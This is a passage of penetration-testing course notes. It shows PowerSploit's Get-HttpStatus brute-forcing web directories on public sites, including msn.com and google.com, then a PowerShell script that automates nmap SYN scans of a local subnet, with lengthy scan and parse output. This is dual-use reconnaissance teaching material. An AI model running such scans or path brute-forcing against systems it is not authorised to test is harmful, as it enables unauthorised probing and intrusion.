C:\Users\Administrator\Desktop\PowerSploit-master> Get-Help Get-HttpStatus -Examples NAME Get-HttpStatus SYNOPSIS Returns the HTTP Status Codes and full URL for specified paths. PowerSploit Function: Get-HttpStatus Author: Chris Campbell (@obscuresec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -------------------------- EXAMPLE 1 -------------------------- C:\PS>Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*} -------------------------- EXAMPLE 2 -------------------------- C:\PS>Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL PS C:\Users\Administrator\Desktop\PowerSploit-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Get-HttpStatus -Target www.commercefun.com -Path .\Recon\Dictionaries\generic.txt -Port 80 | Where-Object {$_.Status -match "ok"} Status URL ------ --- OK http://www.commercefun.com/../ OK http://www.commercefun.com/0/ ``` ###### Exercise - Write a script which could save ```home/default``` page for a list of web servers. ```Get-DefaultPage.ps1``` ```PowerShell $reader = [System.IO.File]::OpenText("C:\Users\Administrator\Desktop\Code\41\ip.txt") while($null -ne ($line = $reader.ReadLine())) { $filename = [System.IO.Path]::GetFileName($line) Invoke-WebRequest $line -OutFile $filename } ``` - Try ```Get-HttpStatus``` on multiple machines. ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Get-HttpStatus -Target www.msn.com -Path .\Recon\Dictionaries\generic.txt -Port 80 | Where-Object {$_.Status -match "ok"} Status URL ------ --- OK http://www.msn.com/../ OK http://www.msn.com/crossdomain.xml PS C:\Users\Administrator\Desktop\PowerSploit-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Get-HttpStatus -Target www.commercefun.com -Path .\Recon\Dictionaries\generic.txt -Port 80 | Where-Object {$_.Status -match "ok"} Status URL ------ --- OK http://www.commercefun.com/../ OK http://www.commercefun.com/0/ ``` ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Get-HttpStatus -Target www.google.com -Path .\Recon\Dictionaries\generic.txt -UseSSL | Where-Object {$_.Status -match "ok"} Status URL ------ --- OK https://www.google.com/../ OK https://www.google.com/a/ PS C:\Users\Administrator\Desktop\PowerSploit-master> ``` ================================================ FILE: 42-Vulnerability-Scanning-and-Analysis.md ================================================ #### 42. Vulnerability Scanning and Analysis ###### Vulnerability Scanning and Analysis - Automating ```nmap``` and ```parsing xml``` results - Automating ```nmap``` ```Start-AutoNmap.ps1``` ```PowerShell $outputpath = "C:\Users\Administrator\Desktop" $IPRanges = "10.0.0.1/24" foreach ($range in $IPRanges) { $temp = $range -split "/" $file = $temp[0] & "nmap.exe" "-nvv" "-Pn" "--top-ports" "20" "$range" "-oX" "$Outputpath\$file.xml" } ``` ```PowerShell PS C:\Users\Administrator\Desktop> C:\Users\Administrator\Desktop\Start-AutoNmap.ps1 Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-10 09:13 Pacific Daylight Time Initiating ARP Ping Scan at 09:13 Scanning 255 hosts [1 port/host] Completed ARP Ping Scan at 09:13, 3.96s elapsed (255 total hosts) Nmap scan report for 10.0.0.0 [host down, received no-response] Nmap scan report for 10.0.0.2 [host down, received no-response] Nmap scan report for 10.0.0.3 [host down, received no-response] Nmap scan report for 10.0.0.4 [host down, received no-response] Nmap scan report for 10.0.0.5 [host down, received no-response] Nmap scan report for 10.0.0.6 [host down, received no-response] Nmap scan report for 10.0.0.7 [host down, received no-response] Nmap scan report for 10.0.0.8 [host down, received no-response] Nmap scan report for 10.0.0.9 [host down, received no-response] Nmap scan report for 10.0.0.10 [host down, received no-response] Nmap scan report for 10.0.0.11 [host down, received no-response] Nmap scan report for 10.0.0.12 [host down, received no-response] Nmap scan report for 10.0.0.13 [host down, received no-response] Nmap scan report for 10.0.0.14 [host down, received no-response] Nmap scan report for 10.0.0.15 [host down, received no-response] Nmap scan report for 10.0.0.16 [host down, received no-response] Nmap scan report for 10.0.0.17 [host down, received no-response] Nmap scan report for 10.0.0.18 [host down, received no-response] Nmap scan report for 10.0.0.19 [host down, received no-response] Nmap scan report for 10.0.0.20 [host down, received no-response] Nmap scan report for 10.0.0.21 [host down, received no-response] Nmap scan report for 10.0.0.22 [host down, received no-response] Nmap scan report for 10.0.0.23 [host down, received no-response] Nmap scan report for 10.0.0.24 [host down, received no-response] Nmap scan report for 10.0.0.25 [host down, received no-response] Nmap scan report for 10.0.0.26 [host down, received no-response] Nmap scan report for 10.0.0.27 [host down, received no-response] Nmap scan report for 10.0.0.28 [host down, received no-response] Nmap scan report for 10.0.0.29 [host down, received no-response] Nmap scan report for 10.0.0.30 [host down, received no-response] Nmap scan report for 10.0.0.31 [host down, received no-response] Nmap scan report for 10.0.0.33 [host down, received no-response] Nmap scan report for 10.0.0.34 [host down, received no-response] Nmap scan report for 10.0.0.35 [host down, received no-response] Nmap scan report for 10.0.0.36 [host down, received no-response] Nmap scan report for 10.0.0.37 [host down, received no-response] Nmap scan report for 10.0.0.38 [host down, received no-response] Nmap scan report for 10.0.0.39 [host down, received no-response] Nmap scan report for 10.0.0.40 [host down, received no-response] Nmap scan report for 10.0.0.41 [host down, received no-response] Nmap scan report for 10.0.0.42 [host down, received no-response] Nmap scan report for 10.0.0.43 [host down, received no-response] Nmap scan report for 10.0.0.44 [host down, received no-response] Nmap scan report for 10.0.0.45 [host down, received no-response] Nmap scan report for 10.0.0.46 [host down, received no-response] Nmap scan report for 10.0.0.47 [host down, received no-response] Nmap scan report for 10.0.0.48 [host down, received no-response] Nmap scan report for 10.0.0.49 [host down, received no-response] Nmap scan report for 10.0.0.50 [host down, received no-response] Nmap scan report for 10.0.0.51 [host down, received no-response] Nmap scan report for 10.0.0.52 [host down, received no-response] Nmap scan report for 10.0.0.54 [host down, received no-response] Nmap scan report for 10.0.0.55 [host down, received no-response] Nmap scan report for 10.0.0.56 [host down, received no-response] Nmap scan report for 10.0.0.57 [host down, received no-response] Nmap scan report for 10.0.0.58 [host down, received no-response] Nmap scan report for 10.0.0.59 [host down, received no-response] Nmap scan report for 10.0.0.60 [host down, received no-response] Nmap scan report for 10.0.0.62 [host down, received no-response] Nmap scan report for 10.0.0.63 [host down, received no-response] Nmap scan report for 10.0.0.64 [host down, received no-response] Nmap scan report for 10.0.0.65 [host down, received no-response] Nmap scan report for 10.0.0.66 [host down, received no-response] Nmap scan report for 10.0.0.67 [host down, received no-response] Nmap scan report for 10.0.0.68 [host down, received no-response] Nmap scan report for 10.0.0.69 [host down, received no-response] Nmap scan report for 10.0.0.70 [host down, received no-response] Nmap scan report for 10.0.0.71 [host down, received no-response] Nmap scan report for 10.0.0.72 [host down, received no-response] Nmap scan report for 10.0.0.73 [host down, received no-response] Nmap scan report for 10.0.0.74 [host down, received no-response] Nmap scan report for 10.0.0.75 [host down, received no-response] Nmap scan report for 10.0.0.76 [host down, received no-response] Nmap scan report for 10.0.0.77 [host down, received no-response] Nmap scan report for 10.0.0.78 [host down, received no-response] Nmap scan report for 10.0.0.79 [host down, received no-response] Nmap scan report for 10.0.0.80 [host down, received no-response] Nmap scan report for 10.0.0.81 [host down, received no-response] Nmap scan report for 10.0.0.82 [host down, received no-response] Nmap scan report for 10.0.0.83 [host down, received no-response] Nmap scan report for 10.0.0.84 [host down, received no-response] Nmap scan report for 10.0.0.85 [host down, received no-response] Nmap scan report for 10.0.0.86 [host down, received no-response] Nmap scan report for 10.0.0.87 [host down, received no-response] Nmap scan report for 10.0.0.88 [host down, received no-response] Nmap scan report for 10.0.0.89 [host down, received no-response] Nmap scan report for 10.0.0.90 [host down, received no-response] Nmap scan report for 10.0.0.91 [host down, received no-response] Nmap scan report for 10.0.0.92 [host down, received no-response] Nmap scan report for 10.0.0.93 [host down, received no-response] Nmap scan report for 10.0.0.94 [host down, received no-response] Nmap scan report for 10.0.0.96 [host down, received no-response] Nmap scan report for 10.0.0.97 [host down, received no-response] Nmap scan report for 10.0.0.98 [host down, received no-response] Nmap scan report for 10.0.0.99 [host down, received no-response] Nmap scan report for 10.0.0.100 [host down, received no-response] Nmap scan report for 10.0.0.101 [host down, received no-response] Nmap scan report for 10.0.0.102 [host down, received no-response] Nmap scan report for 10.0.0.103 [host down, received no-response] Nmap scan report for 10.0.0.104 [host down, received no-response] Nmap scan report for 10.0.0.105 [host down, received no-response] Nmap scan report for 10.0.0.106 [host down, received no-response] Nmap scan report for 10.0.0.107 [host down, received no-response] Nmap scan report for 10.0.0.108 [host down, received no-response] Nmap scan report for 10.0.0.109 [host down, received no-response] Nmap scan report for 10.0.0.110 [host down, received no-response] Nmap scan report for 10.0.0.111 [host down, received no-response] Nmap scan report for 10.0.0.112 [host down, received no-response] Nmap scan report for 10.0.0.113 [host down, received no-response] Nmap scan report for 10.0.0.114 [host down, received no-response] Nmap scan report for 10.0.0.115 [host down, received no-response] Nmap scan report for 10.0.0.116 [host down, received no-response] Nmap scan report for 10.0.0.117 [host down, received no-response] Nmap scan report for 10.0.0.118 [host down, received no-response] Nmap scan report for 10.0.0.119 [host down, received no-response] Nmap scan report for 10.0.0.120 [host down, received no-response] Nmap scan report for 10.0.0.121 [host down, received no-response] Nmap scan report for 10.0.0.122 [host down, received no-response] Nmap scan report for 10.0.0.123 [host down, received no-response] Nmap scan report for 10.0.0.124 [host down, received no-response] Nmap scan report for 10.0.0.125 [host down, received no-response] Nmap scan report for 10.0.0.126 [host down, received no-response] Nmap scan report for 10.0.0.127 [host down, received no-response] Nmap scan report for 10.0.0.128 [host down, received no-response] Nmap scan report for 10.0.0.129 [host down, received no-response] Nmap scan report for 10.0.0.130 [host down, received no-response] Nmap scan report for 10.0.0.131 [host down, received no-response] Nmap scan report for 10.0.0.132 [host down, received no-response] Nmap scan report for 10.0.0.133 [host down, received no-response] Nmap scan report for 10.0.0.134 [host down, received no-response] Nmap scan report for 10.0.0.135 [host down, received no-response] Nmap scan report for 10.0.0.136 [host down, received no-response] Nmap scan report for 10.0.0.137 [host down, received no-response] Nmap scan report for 10.0.0.138 [host down, received no-response] Nmap scan report for 10.0.0.139 [host down, received no-response] Nmap scan report for 10.0.0.140 [host down, received no-response] Nmap scan report for 10.0.0.141 [host down, received no-response] Nmap scan report for 10.0.0.142 [host down, received no-response] Nmap scan report for 10.0.0.143 [host down, received no-response] Nmap scan report for 10.0.0.144 [host down, received no-response] Nmap scan report for 10.0.0.145 [host down, received no-response] Nmap scan report for 10.0.0.146 [host down, received no-response] Nmap scan report for 10.0.0.147 [host down, received no-response] Nmap scan report for 10.0.0.148 [host down, received no-response] Nmap scan report for 10.0.0.149 [host down, received no-response] Nmap scan report for 10.0.0.150 [host down, received no-response] Nmap scan report for 10.0.0.151 [host down, received no-response] Nmap scan report for 10.0.0.152 [host down, received no-response] Nmap scan report for 10.0.0.153 [host down, received no-response] Nmap scan report for 10.0.0.154 [host down, received no-response] Nmap scan report for 10.0.0.155 [host down, received no-response] Nmap scan report for 10.0.0.156 [host down, received no-response] Nmap scan report for 10.0.0.157 [host down, received no-response] Nmap scan report for 10.0.0.158 [host down, received no-response] Nmap scan report for 10.0.0.159 [host down, received no-response] Nmap scan report for 10.0.0.160 [host down, received no-response] Nmap scan report for 10.0.0.161 [host down, received no-response] Nmap scan report for 10.0.0.162 [host down, received no-response] Nmap scan report for 10.0.0.163 [host down, received no-response] Nmap scan report for 10.0.0.164 [host down, received no-response] Nmap scan report for 10.0.0.165 [host down, received no-response] Nmap scan report for 10.0.0.166 [host down, received no-response] Nmap scan report for 10.0.0.167 [host down, received no-response] Nmap scan report for 10.0.0.168 [host down, received no-response] Nmap scan report for 10.0.0.169 [host down, received no-response] Nmap scan report for 10.0.0.170 [host down, received no-response] Nmap scan report for 10.0.0.171 [host down, received no-response] Nmap scan report for 10.0.0.172 [host down, received no-response] Nmap scan report for 10.0.0.173 [host down, received no-response] Nmap scan report for 10.0.0.174 [host down, received no-response] Nmap scan report for 10.0.0.175 [host down, received no-response] Nmap scan report for 10.0.0.176 [host down, received no-response] Nmap scan report for 10.0.0.177 [host down, received no-response] Nmap scan report for 10.0.0.178 [host down, received no-response] Nmap scan report for 10.0.0.179 [host down, received no-response] Nmap scan report for 10.0.0.180 [host down, received no-response] Nmap scan report for 10.0.0.181 [host down, received no-response] Nmap scan report for 10.0.0.182 [host down, received no-response] Nmap scan report for 10.0.0.183 [host down, received no-response] Nmap scan report for 10.0.0.184 [host down, received no-response] Nmap scan report for 10.0.0.185 [host down, received no-response] Nmap scan report for 10.0.0.186 [host down, received no-response] Nmap scan report for 10.0.0.187 [host down, received no-response] Nmap scan report for 10.0.0.188 [host down, received no-response] Nmap scan report for 10.0.0.189 [host down, received no-response] Nmap scan report for 10.0.0.190 [host down, received no-response] Nmap scan report for 10.0.0.191 [host down, received no-response] Nmap scan report for 10.0.0.192 [host down, received no-response] Nmap scan report for 10.0.0.193 [host down, received no-response] Nmap scan report for 10.0.0.194 [host down, received no-response] Nmap scan report for 10.0.0.195 [host down, received no-response] Nmap scan report for 10.0.0.196 [host down, received no-response] Nmap scan report for 10.0.0.197 [host down, received no-response] Nmap scan report for 10.0.0.198 [host down, received no-response] Nmap scan report for 10.0.0.199 [host down, received no-response] Nmap scan report for 10.0.0.200 [host down, received no-response] Nmap scan report for 10.0.0.201 [host down, received no-response] Nmap scan report for 10.0.0.202 [host down, received no-response] Nmap scan report for 10.0.0.203 [host down, received no-response] Nmap scan report for 10.0.0.204 [host down, received no-response] Nmap scan report for 10.0.0.205 [host down, received no-response] Nmap scan report for 10.0.0.206 [host down, received no-response] Nmap scan report for 10.0.0.207 [host down, received no-response] Nmap scan report for 10.0.0.208 [host down, received no-response] Nmap scan report for 10.0.0.209 [host down, received no-response] Nmap scan report for 10.0.0.210 [host down, received no-response] Nmap scan report for 10.0.0.211 [host down, received no-response] Nmap scan report for 10.0.0.212 [host down, received no-response] Nmap scan report for 10.0.0.213 [host down, received no-response] Nmap scan report for 10.0.0.214 [host down, received no-response] Nmap scan report for 10.0.0.215 [host down, received no-response] Nmap scan report for 10.0.0.216 [host down, received no-response] Nmap scan report for 10.0.0.217 [host down, received no-response] Nmap scan report for 10.0.0.218 [host down, received no-response] Nmap scan report for 10.0.0.219 [host down, received no-response] Nmap scan report for 10.0.0.220 [host down, received no-response] Nmap scan report for 10.0.0.221 [host down, received no-response] Nmap scan report for 10.0.0.222 [host down, received no-response] Nmap scan report for 10.0.0.223 [host down, received no-response] Nmap scan report for 10.0.0.224 [host down, received no-response] Nmap scan report for 10.0.0.225 [host down, received no-response] Nmap scan report for 10.0.0.226 [host down, received no-response] Nmap scan report for 10.0.0.227 [host down, received no-response] Nmap scan report for 10.0.0.228 [host down, received no-response] Nmap scan report for 10.0.0.229 [host down, received no-response] Nmap scan report for 10.0.0.230 [host down, received no-response] Nmap scan report for 10.0.0.231 [host down, received no-response] Nmap scan report for 10.0.0.232 [host down, received no-response] Nmap scan report for 10.0.0.234 [host down, received no-response] Nmap scan report for 10.0.0.235 [host down, received no-response] Nmap scan report for 10.0.0.236 [host down, received no-response] Nmap scan report for 10.0.0.237 [host down, received no-response] Nmap scan report for 10.0.0.238 [host down, received no-response] Nmap scan report for 10.0.0.239 [host down, received no-response] Nmap scan report for 10.0.0.240 [host down, received no-response] Nmap scan report for 10.0.0.241 [host down, received no-response] Nmap scan report for 10.0.0.242 [host down, received no-response] Nmap scan report for 10.0.0.243 [host down, received no-response] Nmap scan report for 10.0.0.244 [host down, received no-response] Nmap scan report for 10.0.0.245 [host down, received no-response] Nmap scan report for 10.0.0.246 [host down, received no-response] Nmap scan report for 10.0.0.247 [host down, received no-response] Nmap scan report for 10.0.0.248 [host down, received no-response] Nmap scan report for 10.0.0.249 [host down, received no-response] Nmap scan report for 10.0.0.250 [host down, received no-response] Nmap scan report for 10.0.0.251 [host down, received no-response] Nmap scan report for 10.0.0.252 [host down, received no-response] Nmap scan report for 10.0.0.253 [host down, received no-response] Nmap scan report for 10.0.0.255 [host down, received no-response] Initiating SYN Stealth Scan at 09:13 Scanning 6 hosts [20 ports/host] Discovered open port 80/tcp on 10.0.0.1 Discovered open port 111/tcp on 10.0.0.254 Discovered open port 53/tcp on 10.0.0.1 Discovered open port 443/tcp on 10.0.0.1 Completed SYN Stealth Scan at 09:13, 2.16s elapsed (120 total ports) Nmap scan report for 10.0.0.1 Host is up, received arp-response (0.022s latency). Scanned at 2017-07-10 09:13:17 Pacific Daylight Time for 6s PORT STATE SERVICE REASON 21/tcp closed ftp reset ttl 64 22/tcp filtered ssh no-response 23/tcp filtered telnet no-response 25/tcp closed smtp reset ttl 64 53/tcp open domain syn-ack ttl 64 80/tcp open http syn-ack ttl 64 110/tcp closed pop3 reset ttl 64 111/tcp closed rpcbind reset ttl 64 135/tcp closed msrpc reset ttl 64 139/tcp closed netbios-ssn reset ttl 64 143/tcp closed imap reset ttl 64 443/tcp open https syn-ack ttl 64 445/tcp closed microsoft-ds reset ttl 64 993/tcp closed imaps reset ttl 64 995/tcp closed pop3s reset ttl 64 1723/tcp closed pptp reset ttl 64 3306/tcp closed mysql reset ttl 64 3389/tcp closed ms-wbt-server reset ttl 64 5900/tcp closed vnc reset ttl 64 8080/tcp closed http-proxy reset ttl 64 MAC Address: 00:50:F1:80:00:00 (Intel) Nmap scan report for 10.0.0.32 Host is up, received arp-response (0.029s latency). Scanned at 2017-07-10 09:13:17 Pacific Daylight Time for 4s PORT STATE SERVICE REASON 21/tcp closed ftp reset ttl 64 22/tcp closed ssh reset ttl 64 23/tcp closed telnet reset ttl 64 25/tcp closed smtp reset ttl 64 53/tcp closed domain reset ttl 64 80/tcp closed http reset ttl 64 110/tcp closed pop3 reset ttl 64 111/tcp closed rpcbind reset ttl 64 135/tcp closed msrpc reset ttl 64 139/tcp closed netbios-ssn reset ttl 64 143/tcp closed imap reset ttl 64 443/tcp closed https reset ttl 64 445/tcp closed microsoft-ds reset ttl 64 993/tcp closed imaps reset ttl 64 995/tcp closed pop3s reset ttl 64 1723/tcp closed pptp reset ttl 64 3306/tcp closed mysql reset ttl 64 3389/tcp closed ms-wbt-server reset ttl 64 5900/tcp closed vnc reset ttl 64 8080/tcp closed http-proxy reset ttl 64 MAC Address: 90:FD:61:C0:9B:B2 (Apple) Nmap scan report for 10.0.0.53 Host is up, received arp-response (0.00s latency). Scanned at 2017-07-10 09:13:17 Pacific Daylight Time for 6s PORT STATE SERVICE REASON 21/tcp filtered ftp no-response 22/tcp filtered ssh no-response 23/tcp filtered telnet no-response 25/tcp filtered smtp no-response 53/tcp filtered domain no-response 80/tcp filtered http no-response 110/tcp filtered pop3 no-response 111/tcp filtered rpcbind no-response 135/tcp filtered msrpc no-response 139/tcp filtered netbios-ssn no-response 143/tcp filtered imap no-response 443/tcp filtered https no-response 445/tcp filtered microsoft-ds no-response 993/tcp filtered imaps no-response 995/tcp filtered pop3s no-response 1723/tcp filtered pptp no-response 3306/tcp filtered mysql no-response 3389/tcp filtered ms-wbt-server no-response 5900/tcp filtered vnc no-response 8080/tcp filtered http-proxy no-response MAC Address: 40:F0:2F:57:6C:13 (Liteon Technology) Nmap scan report for 10.0.0.61 Host is up, received arp-response (0.026s latency). Scanned at 2017-07-10 09:13:17 Pacific Daylight Time for 4s PORT STATE SERVICE REASON 21/tcp closed ftp reset ttl 64 22/tcp closed ssh reset ttl 64 23/tcp closed telnet reset ttl 64 25/tcp closed smtp reset ttl 64 53/tcp closed domain reset ttl 64 80/tcp closed http reset ttl 64 110/tcp closed pop3 reset ttl 64 111/tcp closed rpcbind reset ttl 64 135/tcp closed msrpc reset ttl 64 139/tcp closed netbios-ssn reset ttl 64 143/tcp closed imap reset ttl 64 443/tcp closed https reset ttl 64 445/tcp closed microsoft-ds reset ttl 64 993/tcp closed imaps reset ttl 64 995/tcp closed pop3s reset ttl 64 1723/tcp closed pptp reset ttl 64 3306/tcp closed mysql reset ttl 64 3389/tcp closed ms-wbt-server reset ttl 64 5900/tcp closed vnc reset ttl 64 8080/tcp closed http-proxy reset ttl 64 MAC Address: 00:9A:CD:C9:77:54 (Huawei Technologies) Nmap scan report for 10.0.0.95 Host is up, received arp-response (0.0022s latency). Scanned at 2017-07-10 09:13:17 Pacific Daylight Time for 4s PORT STATE SERVICE REASON 21/tcp closed ftp reset ttl 64 22/tcp closed ssh reset ttl 64 23/tcp closed telnet reset ttl 64 25/tcp closed smtp reset ttl 64 53/tcp closed domain reset ttl 64 80/tcp closed http reset ttl 64 110/tcp closed pop3 reset ttl 64 111/tcp closed rpcbind reset ttl 64 135/tcp closed msrpc reset ttl 64 139/tcp closed netbios-ssn reset ttl 64 143/tcp closed imap reset ttl 64 443/tcp closed https reset ttl 64 445/tcp closed microsoft-ds reset ttl 64 993/tcp closed imaps reset ttl 64 995/tcp closed pop3s reset ttl 64 1723/tcp closed pptp reset ttl 64 3306/tcp closed mysql reset ttl 64 3389/tcp closed ms-wbt-server reset ttl 64 5900/tcp closed vnc reset ttl 64 8080/tcp closed http-proxy reset ttl 64 MAC Address: F4:0F:24:33:5E:D1 (Apple) Nmap scan report for 10.0.0.254 Host is up, received arp-response (0.013s latency). Scanned at 2017-07-10 09:13:17 Pacific Daylight Time for 4s PORT STATE SERVICE REASON 21/tcp closed ftp reset ttl 64 22/tcp closed ssh reset ttl 64 23/tcp closed telnet reset ttl 64 25/tcp closed smtp reset ttl 64 53/tcp closed domain reset ttl 64 80/tcp closed http reset ttl 64 110/tcp closed pop3 reset ttl 64 111/tcp open rpcbind syn-ack ttl 64 135/tcp closed msrpc reset ttl 64 139/tcp closed netbios-ssn reset ttl 64 143/tcp closed imap reset ttl 64 443/tcp closed https reset ttl 64 445/tcp closed microsoft-ds reset ttl 64 993/tcp closed imaps reset ttl 64 995/tcp closed pop3s reset ttl 64 1723/tcp closed pptp reset ttl 64 3306/tcp closed mysql reset ttl 64 3389/tcp closed ms-wbt-server reset ttl 64 5900/tcp closed vnc reset ttl 64 8080/tcp closed http-proxy reset ttl 64 MAC Address: 00:05:04:03:02:01 (Naray Information & Communication Enterprise) Initiating SYN Stealth Scan at 09:13 Scanning 10.0.0.233 [20 ports] Discovered open port 445/tcp on 10.0.0.233 Discovered open port 135/tcp on 10.0.0.233 Discovered open port 3389/tcp on 10.0.0.233 Discovered open port 53/tcp on 10.0.0.233 Discovered open port 139/tcp on 10.0.0.233 Completed SYN Stealth Scan at 09:13, 0.23s elapsed (20 total ports) Nmap scan report for 10.0.0.233 Host is up, received user-set (0.00s latency). Scanned at 2017-07-10 09:13:23 Pacific Daylight Time for 1s PORT STATE SERVICE REASON 21/tcp closed ftp reset ttl 128 22/tcp closed ssh reset ttl 128 23/tcp closed telnet reset ttl 128 25/tcp closed smtp reset ttl 128 53/tcp open domain syn-ack ttl 128 80/tcp closed http reset ttl 128 110/tcp closed pop3 reset ttl 128 111/tcp closed rpcbind reset ttl 128 135/tcp open msrpc syn-ack ttl 128 139/tcp open netbios-ssn syn-ack ttl 128 143/tcp closed imap reset ttl 128 443/tcp closed https reset ttl 128 445/tcp open microsoft-ds syn-ack ttl 128 993/tcp closed imaps reset ttl 128 995/tcp closed pop3s reset ttl 128 1723/tcp closed pptp reset ttl 128 3306/tcp closed mysql reset ttl 128 3389/tcp open ms-wbt-server syn-ack ttl 128 5900/tcp closed vnc reset ttl 128 8080/tcp closed http-proxy reset ttl 128 Read data files from: C:\Program Files (x86)\Nmap Nmap done: 256 IP addresses (7 hosts up) scanned in 6.56 seconds Raw packets sent: 670 (21.384KB) | Rcvd: 151 (6.072KB) PS C:\Users\Administrator\Desktop> ``` - Parsing ```xml``` results using [```Parse-Nmap.ps1```](https://github.com/EnclaveConsulting/SANS-SEC505) ```PowerShell PS C:\Users\Administrator> cd .\Desktop\SEC505-Scripts PS C:\Users\Administrator\Desktop\SEC505-Scripts> cd .\Day1-PowerShell PS C:\Users\Administrator\Desktop\SEC505-Scripts\Day1-PowerShell> Import-Module .\Parse-Nmap.ps1 ``` ```PowerShell PS C:\Users\Administrator\Desktop\SEC505-Scripts\Day1-PowerShell> parse-nmap -Path ..\..\10.0.0.1.xml -RunStatsOnly FilePath : C:\Users\Administrator\Desktop\10.0.0.1.xml FileName : 10.0.0.1.xml Scanner : nmap Profile : ProfileName : Hint : ScanName : Arguments : "C:\\Program Files (x86)\\Nmap\\nmap.exe" -nvv -Pn --top-ports 20 -oX C:\\Users\\Administrator\\Desktop\\10.0.0.1.xml 10.0.0.1/24 Options : NmapVersion : 7.50 XmlOutputVersion : 1.04 StartTime : 7/10/2017 9:33:13 AM FinishedTime : 7/10/2017 9:33:17 AM ElapsedSeconds : 4.16 ScanTypes : syn TcpPorts : 21,22,23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 UdpPorts : IpProtocols : SctpPorts : VerboseLevel : 2 DebuggingLevel : 0 HostsUp : 8 HostsDown : 248 HostsTotal : 256 PS C:\Users\Administrator\Desktop\SEC505-Scripts\Day1-PowerShell> ``` ```PowerShell PS C:\Users\Administrator\Desktop\SEC505-Scripts\Day1-PowerShell> parse-nmap -Path ..\..\10.0.0.1.xml HostName : FQDN : Status : down IPv4 : 10.0.0.0 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.2 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.3 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.4 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.5 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.6 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.7 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.8 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.9 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.10 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.11 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.12 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.13 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.14 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.15 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.16 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.17 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.18 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.20 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.21 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.22 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.23 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.24 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.25 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.26 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.27 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.28 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.29 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.30 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.31 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.33 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.34 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.35 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.36 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.37 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.38 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.39 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.40 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.41 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.42 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.43 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.44 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.45 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.46 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.47 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 : 10.0.0.48 IPv6 : MAC : Ports : Services : OS : Script : HostName : FQDN : Status : down IPv4 